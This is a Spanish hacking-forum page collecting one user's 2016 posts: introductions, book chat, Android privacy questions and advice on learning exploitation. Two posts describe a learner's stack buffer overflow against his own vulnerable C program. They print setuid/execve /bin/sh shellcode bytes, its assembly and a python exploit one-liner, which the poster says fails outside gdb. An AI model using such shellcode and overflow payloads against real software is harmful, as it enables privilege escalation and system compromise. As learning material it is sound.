Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Cortad0r

#1
Hacking / Re:Nuestro primer BufferOverflow.
Octubre 12, 2016, 12:58:00 AM
Que tal @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta gracias por la info.

Ya conseguí ejecutar el shellcode, poniendo NOP's en lugar de A's al inicio del buffer y saltando directamente a la direccion del arreglo usando EIP. Pero solo lo logre desde gdb, y si lo vuelvo a correr ya no funciona.


Debo salir y volver a entrar a gdb para que funcione. Y si lo corro directamente desde la terminal tampoco ejecuta el shellcode.

[

¿Alguien sabe por que sucede esto?

Salúos.
#2
Hacking / Re:Nuestro primer BufferOverflow.
Octubre 08, 2016, 07:37:21 PM
Una vez hecho esto, ya que controlo el registro EIP y por lo visto el EBP también, ¿cómo puedo hacer el salto a una shellcode? Suponiendo que le paso esta misma como parte del argumento. He investigado un poco y vi que necesitaba buscar en el código funciones como RET, JMP, PUSH. En especial le presté atencion a PUSH y RET. Según entendí, Si pones una dirección en EBP, RET saltará a ella. Aunque estoy intentando hacerlo usando una versió del programa creada por mi. Aunque pude acceder a la funcion objetivo (panelControl) no logro ejecutar el shellcode. ¿Puede ser que influya que no utilicé el parámetro --fno-stack-protector a la hora de compilar? Yo supuse que no ya que con o sin el pude acceder a la función. El código es el siguiente:
Código: php

#include <stdio.h>
#include <string.h>

void panelControl(char *cn[]){
printf("ACCESO CONCEDIDO. xD\n");
}

void verificarAcceso(char *codename[]){
char cdnm[50]; strcpy(cdnm, codename);
printf("Procesando: %s\n", cdnm);
if(strcmp(cdnm, "asdfghjkl")) {
printf("NO ENCONTRADO.\n");
} else {
panelControl(cdnm);
}
}

int main (int argc, char *argv[]){
if(argc > 1) {
verificarAcceso(argv[1]);
} else {
printf("Indicar el argumento.\n");
}
return 0;
}


Me indica el 'Segmentation fault' cuando le paso 58 o más caracteres, de ahí uso los últimos 37 para el shellcode. Los 4 bytes siguientes son EBP y los 4 que siguen son EIP.

Este es el shellcode que estoy utilizando:
Código: php

\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80


Lo encontré en internet y como venía con un código ASM decidí probarlo para comprobar si funcionaba la shellcode en mi sistema. Entonces compilo y pruebo:


El código del shellcode en ASM es el siguiente:
Código: php

  push  $0x17
  pop    %eax
  xor     %ebx, %ebx
  int     $0x80

  push  $0x2e
  pop    %eax
  push  %ebx
  int     $0x80

  xor     %edx, %edx
  push   $0xb
  pop     %eax
  push   %edx
  push   $0x68732f2f
  push   $0x6e69622f
  mov    %esp, %ebx
  push   %edx
  push   %ebx
  mov    %esp, %ecx
  int      $0x80


Entonces si no me equivoco el supuesto exploit quedaría de la siguiente forma:
Código: php

python2.7 -c 'print "A"*21+"\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"+"\xf7\xcf\xff\xff"+"\x1b\x85\x04\x08"'


Suponiendo que 0xffffcff7 es la dirección donde comienza el shellcode, que estaría sobreescribiendo en ESP y 0x0804851b es la dirección de un RET. Y así saltar al shellcode, creo xD. Procedo a compilar el programa:


Me salen unos avisos a la hora de compilar. Pero como me generó el ejecutable de todas formas y estoy emocionado, no me molesto en ver de que se tratan y sigo.


No funciona :(
Si trato de sólo acceder a la funcion 'panelControl' basta con poner su dirección 0x0804849b en el EIP y funciona:


Pero no logro hacer que se ejecute el shellcode. Como podrán observar no tengo mucha experiencia, tal vez me estoy pasando algo o lo estoy haciendo de la forma equivocada. Me basé también mucho en este video, aunque no pude comprender del todo ya que su inglés es muy inglés jaja xD: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Salúos.
#3
GNU/Linux / Re:Postea tu escritorio Linux
Septiembre 21, 2016, 01:34:44 PM
"Actually on KDE myself. I know GNOME is supposed to be better, but you know what they say, old habits, they die hard."

#4
¿Que hay de las apps que no tienen permitido el acceso al superusuario? Ya que teóricamente el celular notifica cada que se hace uso del mismo. Igual con los permisos. He visto que algunas aplicaciones que he instalado a pesar de no requerir ningún permiso (red, archivos, etc) aparentemente aún así pueden conectarse a internet ¿alguien puede explicar como sucede esto?
#5
Presentaciones y cumpleaños / Re:Saludos a la comunidad.
Septiembre 19, 2016, 05:22:03 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Bienvenido Cutter .. espero que la pases bien aca en el grupo. Una consulta, que autores de novelas sobre hackers y policiales recomendarias?

Gracias!

Que tal @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. La verdad no soy muy conocedor del tema, apenas he leido un par de novelas. Con esa temática de William Gibson, no he tenido oportunidad de leer las demás entregas de la trilogía Neuromante pero me dicen que son muy buenas, lo malo es la traducción y a mi inglés le falta pulirse un poco. Recuerdo haber leído uno de John Katzenbach de estilo mas o menos policiaco pero pegando mas al suspense, aunque no recuerdo el nombre del libro. ¿Tu que me recomiendas de el mismo estilo?
#6
Creerás que soy un paranóico de primera pero yo también tengo roteado el celular con firewall y aún así no confío al 100% y mucho menos cuando no hay posibilidad de ver el código de lo que estás instalando. Ya sabes lo que dicen sobre la vigilancia hoy en día. Te aconsejo que te hagas un par de claves y cifres todo aquello que no te gustaría compartir, y aún así desconfía  :P
#7
Yo personalmente acabo de descubrir no hace mucho que sin Assembler y una buena base de C (No C++) no se llega muy lejos. Tal como dice @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, saber como funciona el ordenador al nivel de CPU y memoria es escencial para desarrollar exploits, por lo que hay que leer un poco sobre eso para comenzar. Después puedes definir tus conocimientos aprendiendo C, ASM y mínimo conocer la sintaxis básica de Python o Perl la cual puedes necesitar en cualquier momento. Y si eres hardcore puedes comenzar también a leer los fundamentos de redes  :P

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta pasate por No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Adastra, el autor tiene un pequeño curso de explotación de software en video y creo que también uno de Python orientado al hacking. Además tiene entradas muy buenas, leételas desde el inicio no te arrepentirás  ;)

Saludos.
#8
Presentaciones y cumpleaños / Re:Saludos a la comunidad.
Septiembre 18, 2016, 03:25:41 AM
Gracias por los saludos compañeros!  :D

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Bienvenido a la comunidad bro!
Sobre que lenguajes tienes conocimientos?

Saludos,
Subzer.

Tengo conocimientos básicos de C, Java, Python, Bash, Perl, HTML, SQL y actualmente busco algún curso o manual de ASM pero no he encontrado uno actualizado que use GAS o NASM, me temo que tendré que hacer el mío ;D jaja
#9
Presentaciones y cumpleaños / Re:Saludos a la comunidad.
Septiembre 17, 2016, 12:21:27 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Saludos y bienvenido... entiendo el significado de tu nick pero a que se debe?, por algun hecho especifico? como nacio? jeje.

Gracias  :D
Cortador es un nombre clave que utiliza Case, el protagonista de la novela cyberpunk Neuromante de William Gibson, durante una operación de hackeo.
#10
Presentaciones y cumpleaños / Saludos a la comunidad.
Septiembre 16, 2016, 04:02:53 PM
Buenas a todos! Me encontré con el foro siguiendo el curso de hacking de roadd y rollth en su página. No sé mucho de hacking aún, mucha teoría poca práctica debido a la universidad. Aunque eso no cambia el hecho de que me apasiona ver código ensamblador en vim por las noches, o la inminente paranoia que me hace llamar el 'netstat -putona' un par de miles de veces al día xD
Me gusta programar (cuando me interesa lo que programo, claro jaja) en cualquier lenguaje. No es que los domine todos pero con la documentación suele bastar para hacer cosas simples y a veces cosas muy interesantes xD
Nací en un wind2 95 hace ya un buen tiempo creando los famosos .BAT pero me he forjado (y continúo) siendo un seguidor fiel del ave marina no voladora de la antártica xD Pueden llamarme Cortador, de hecho iba a poner ese nick pero al parecer alguien se me ha adelantado ¬¬ xD
Saludos a todos, espero poder ayudar en algo a la comunidad. Desde ya para servirles pero más que nada, conocer.